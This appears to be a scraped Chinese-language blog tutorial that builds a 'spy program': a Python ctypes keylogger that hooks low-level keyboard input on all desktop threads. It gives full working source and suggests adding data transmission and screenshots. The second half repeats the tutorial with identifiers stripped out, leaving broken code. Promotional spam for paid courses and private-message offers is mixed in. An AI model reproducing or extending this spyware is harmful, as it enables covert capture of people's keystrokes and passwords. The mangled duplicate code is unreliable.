知识点
这次我们使用来打造一款间谍程序
程序中会用到许多知识点,大致分为四块
此处可以在MSDN上查看
基础重点在库的使用,使用方法请点击此处
C语言基础
Hook
写到在这里还是提醒下,很多人学过程中会遇到各种烦恼问题,没有人解答容易放弃。为此我建了个学习资源圈里面有2020年最新学习资料,如果你正在学,可以关注我,后台私信我 ‘p’ 免费获取!还可以跟老司机讨论!
接下来看程序的基本原理在于通过注册Hook,记录系统事件
那么什么是Hook呢
Hook 技术又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递
注册Hook时我们需要先导入DLL库,在中我们使用来导入,导入方法如下
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
我们导入了.dll和.dll
这两个DLL有什么用处呢
.dll 是用户界面相关应用程序接口,用于包括处理,基本用户界面等特性,如创建窗口和发送消息
.dll控制着系统的内存管理、数据的输入输出操作和中断处理
流程部分
知道了我们要使用什么样的工具,那么第一步应该怎么做呢
1.首先我们需要先注册Hook到系统上hook技术,通过.dll中的函数,我们可以在系统上注册钩子
HHOOK SetWindowsHookExA(
int idHook,
HOOKPROC lpfn,
HINSTANCE hmod,
DWORD dwThreadId
);
通过查看文档我们看到函数的参数及参数类型如上所示,详细文档点击此链接查看
通过文档我们看到第一个参数中填入钩子的类型
的常量值为13代表的意思是监视低级键盘输入事件,我们此处来监听键盘事件
第二个参数lpfn代表指向钩子过程的指针,要填入钩子过程(函数),我们可以在此处来添加额外代码达到我们想要达成的目的
第三个参数hmod表示为DLL句柄,我们可以使用中的来获取句柄
最后一个参数我们填入0代表与同一桌面上所有的线程关联
代码如下
user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)
如何使用来编写我们的钩子过程呢,通过文档我们可以得知下使用来创建函数
此时我们发现有和两个函数,具体要使用哪一个呢,这两个的区别为
为下独有的,通过使用使用调用约定的函数
使用标准C调用约定的函数
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
因为我们调用的是,会使用回调函数,同时我们也需要在定义它
数据结构如下
LRESULT CALLBACK LowLevelKeyboardProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
);
按照官方文档提示 如果nCode小于零,则挂钩过程必须将消息传递给函数,而无需进一步处理,并且应返回返回的值
我们转换为代码
class KBDLLHOOKSTRUCT(Structure):
_fields_ = [
('vkCode', DWORD),
('scanCode', DWORD),
('flags', DWORD),
('time', DWORD),
('dwExtraInfo', DWORD)]
def hookProc(nCode, wParam, lParam):
if nCode < 0:
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
else:
# 此处插入我们的代码
pass
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢,虽然在 7及更高版本上,该钩子会被静默删除而不被调用。应用程序无法知道挂钩是否已删除。我们还是主动进行删除
删除需要使用.dll的,参数为Hook句柄
user32.UnhookWindowsHookEx(hooked)
下面贴上全部代码
1 import sys
2 from ctypes import *
3 from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
4
5 user32 = CDLL("user32.dll")
6 kernel32 = CDLL("kernel32.dll")
7
8
9 class KBDLLHOOKSTRUCT(Structure):
10 _fields_ = [
11 ('vkCode', DWORD),
12 ('scanCode', DWORD),
13 ('flags', DWORD),
14 ('time', DWORD),
15 ('dwExtraInfo', DWORD)]
16
17
18 def uninstallHookProc(hooked):
19 if hooked is None:
20 return
21 user32.UnhookWindowsHookEx(hooked)
22 hooked = None
23
24
25 def hookProc(nCode, wParam, lParam):
26 if nCode < 0:
27 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
28 else:
29 if wParam == 256:
30 if 162 == lParam.contents.value:
31 print("Ctrl pressed, call Hook uninstall()")
32 uninstallHookProc(hooked)
33 sys.exit(-1)
34 capsLock = user32.GetKeyState(20)
35 # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
36 if lParam.contents.value==13:
37 print("n")
38 elif capsLock:
39 print(chr(lParam.contents.value),end="")
40 else:
41 print(chr(lParam.contents.value+32),end="")
42 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
43
44
45 def startKeyLog():
46 msg = MSG()
47 user32.GetMessageA(byref(msg), 0, 0, 0)
48
49
50 def installHookProc(hooked, pointer):
51 hooked = user32.SetWindowsHookExA(
52 13,
53 pointer,
54 kernel32.GetModuleHandleW(),
55 0
56 )
57 if not hooked:
58 return False
59 return True
60
61
62 HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
63 pointer = HOOKPROC(hookProc)
64 hooked = None
65 if installHookProc(hooked, pointer):
66 print("Hook installed")
67 try:
68 msg = MSG()
69 user32.GetMessageA(byref(msg), 0, 0, 0)
70 except KeyboardInterrupt as kerror:
71 uninstallHookProc(hooked)
72 print("Hook uninstall...")
73 else:
74 print("Hook installed error")
贴上我们的效果图
代码
我们还可以再添加上额外的代码比如数据传输,截屏等等 ^_^
我们常听说:如果要操作某个软件或者监听某个软件的话,可以使用钩子( Hook )钩住软件,那这是如何操作的呢?用又如何实现呢?
本教程我们将 通过注册Hook 打造一款间谍程序,来监听win系统的笔记本,先给大家演示下效果吧!
代码
一、 Hook 技术
程序的基本原理在于通过 注册Hook ,记录系统事件。
那么什么是Hook呢?
Hook 技术又叫做 钩子函数 ,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递
注册Hook时我们需要使用到两个DLL库: .dll 和 .dll 。这两个DLL有什么用处呢:
二、实现
了解了钩子的用处,那我们就来正式开始实现吧!
1.注册钩子
首先我们需要先注册Hook到系统上,通过 .dll中的函数 我们可以在系统上注册钩子。
文档
通过查看 微软官方文档(
)hook技术,我们看到 函数的参数及参数类型如上所示。
我们简单介绍一下关于这几个参数的含义:
:钩子的类型,可以监听消息、键盘、鼠标等等,这里 我们来 监视低级键盘输入事件作为案例演示!lpfn :钩子函数,这里就表示你监听到事件后要怎么处理,核心作用!hmod : DLL句柄(类似编号) , 我们可以使用 中的 来获取句柄 : 我们填入0代表与同一桌面上所有的线程关联
上图中的代码我们可以看出使用的是C++语法,这时候中的 库 就可以助我们一臂之力!
是 的外部函数库。它提供了与 C 兼容的数据类型, 并允许调用 DLL 或共享库中的函数 。可使用该模块以纯 形式对这些库进行封装。
使用 库 注册钩子代码:
from ctypes import CDLL
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
user32.SetWindowsHookExA(13, handleProc, kernel32.GetModuleHandleW(), 0)
更多关于 库 使用教程可查看官方文档:
2.编写钩子函数
上面我们说过 监视低级键盘输入事件( ) 作为案例演示!
而监听键盘事件() 会使用 回调函数,同时我们也需要在定义它!
代码
我们再次使用的 库 定义一个回调函数!
(nCode, , ):
if nCode < 0:
.(, nCode, , )
else:
# 此处插入我们的代码
pass
.(, nCode, , )
3.删除Hook
最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢。
虽然在 7及更高版本上,该钩子会被静默删除而不被调用。
但是应用程序无法知道挂钩是否已删除,我们还是主动进行删除。
删除需要使用 .dll 的 。
def uninstallHookProc(hooked):
if hooked is None:
return
user32.UnhookWindowsHookEx(hooked)
hooked = None
完整的钩子函数:
(nCode, , ):
if nCode < 0:
.(, nCode, , )
else:
if == 256:
if 162 == ..value:
print("Ctrl , call Hook ()")
()
sys.exit(-1)
= .(20)
if ..value == 13:
print("n")
elif :
print(chr(..value), end="")
else:
print(chr(..value + 32), end="")
.(, nCode, , )
限时特惠:本站持续每日更新海量各大内部创业课程,一年会员仅需要98元,全站资源免费下载
点击查看详情
站长微信:Jiucxh